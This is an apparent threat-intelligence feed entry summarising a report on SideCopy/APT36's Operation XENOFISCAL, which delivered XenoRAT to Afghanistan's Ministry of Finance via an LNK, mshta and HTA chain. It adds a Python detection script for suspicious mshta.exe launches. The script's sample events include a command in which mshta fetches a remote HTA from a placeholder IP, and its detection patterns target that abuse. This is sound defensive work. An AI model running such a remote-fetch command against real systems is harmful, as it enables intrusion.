Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan
ID: be345f68-69ff-5d39-a268-13a06485bbef
STIX ID: report--be345f68-69ff-5d39-a268-13a06485bbef
Feed Name: Seqrite Blog
## Executive summary

Seqrite Labs documents a targeted spear-phishing campaign, Operation XENOFISCAL, attributed to the SideCopy/APT36 cluster. The lure was a ZIP archive containing a Pashto-labeled LNK file; opening it invoked mshta to fetch an obfuscated HTA/JavaScript payload, which staged several .NET loader DLLs and in-memory shellcode and ultimately deployed XenoRAT on provincial Ministry of Finance systems in Afghanistan. The report includes the full technical analysis, IOCs (hashes, domains, IPs), infrastructure attribution, and MITRE ATT&CK mappings.
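The initial-access step described above (a double-clicked LNK spawning mshta.exe to pull a remote HTA) leaves a recognisable trace in process-creation telemetry. The following is an added hunting example written for this summary, not code or IOCs from the Seqrite report: it classifies Sysmon-style process-creation records and flags mshta.exe invocations that carry a URL or an inline script handler, load an HTA from a user-writable path, or are spawned by explorer.exe. The sample events, the 198.51.100.23 address (RFC 5737 documentation range), and all paths are constructed for the example; the inline `javascript:`/`vbscript:` check generalises beyond the specific chain on this page to a related mshta abuse pattern.

```python
"""Hunt process-creation telemetry for the LNK -> mshta.exe -> remote HTA pattern.

Added example for this page; the records below are constructed, not report IOCs.
"""
from __future__ import annotations

import ntpath
import re

# Constructed Sysmon-like Event ID 1 records (field names follow Sysmon's schema).
SAMPLE_EVENTS = [
    {   # LNK double-clicked in Explorer, mshta pulls a remote HTA (the pattern in the summary)
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" http://198.51.100.23/ntc.hta',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # Office spawning mshta on a dropped HTA in the user's Temp folder
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'mshta.exe C:\Users\bob\AppData\Local\Temp\doc.hta',
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # Vendor tool running a local HTA from Program Files: no indicator hit
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\console.hta"',
        "ParentImage": r"C:\Windows\System32\services.exe",
    },
    {   # Not mshta at all; ignored by this rule
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://[^\s\"']+")
INLINE_SCRIPT_RE = re.compile(r"(?i)\b(?:javascript|vbscript):")
USER_WRITABLE_RE = re.compile(r"(?i)\\(?:Users|ProgramData|Temp|Public)\\")


def is_mshta(image: str) -> bool:
    """True when the executed image is mshta.exe, regardless of directory."""
    return ntpath.basename(image).lower() == "mshta.exe"


def classify(evt: dict) -> tuple[str, list[str]]:
    """Return (severity, reasons) for one process-creation record.

    high   : mshta given a URL or an inline javascript:/vbscript: payload
    medium : mshta on a user-writable path or spawned by explorer.exe
    none   : not mshta, or nothing suspicious about the invocation
    """
    if not is_mshta(evt.get("Image", "")):
        return "none", []
    cmd = evt.get("CommandLine", "")
    parent = ntpath.basename(evt.get("ParentImage", "")).lower()
    reasons: list[str] = []

    url = URL_RE.search(cmd)
    if url:
        reasons.append(f"remote HTA fetched from {url.group(0)}")
    inline = INLINE_SCRIPT_RE.search(cmd)
    if inline:
        reasons.append("inline javascript:/vbscript: payload on the command line")
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("HTA loaded from a user-writable path")
    if parent == "explorer.exe":
        reasons.append("spawned by explorer.exe (consistent with a double-clicked LNK)")

    if not reasons:
        return "none", []
    return ("high" if (url or inline) else "medium"), reasons


def hunt(events: list[dict]) -> list[tuple[str, dict, list[str]]]:
    """Return (severity, event, reasons) for every record that is not 'none'."""
    hits = []
    for evt in events:
        severity, reasons = classify(evt)
        if severity != "none":
            hits.append((severity, evt, reasons))
    return hits


if __name__ == "__main__":
    for severity, evt, reasons in hunt(SAMPLE_EVENTS):
        print(f"[{severity.upper()}] {evt['CommandLine']}")
        for r in reasons:
            print(f"    - {r}")
```

Run against real telemetry, the same classifier can be fed from a Sysmon or EDR export by mapping the `Image`, `CommandLine` and `ParentImage` fields; the remote-URL and explorer-parent reasons together are the signature of the chain this report describes, while the local-path and inline-script reasons catch neighbouring mshta LOLBin abuse.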
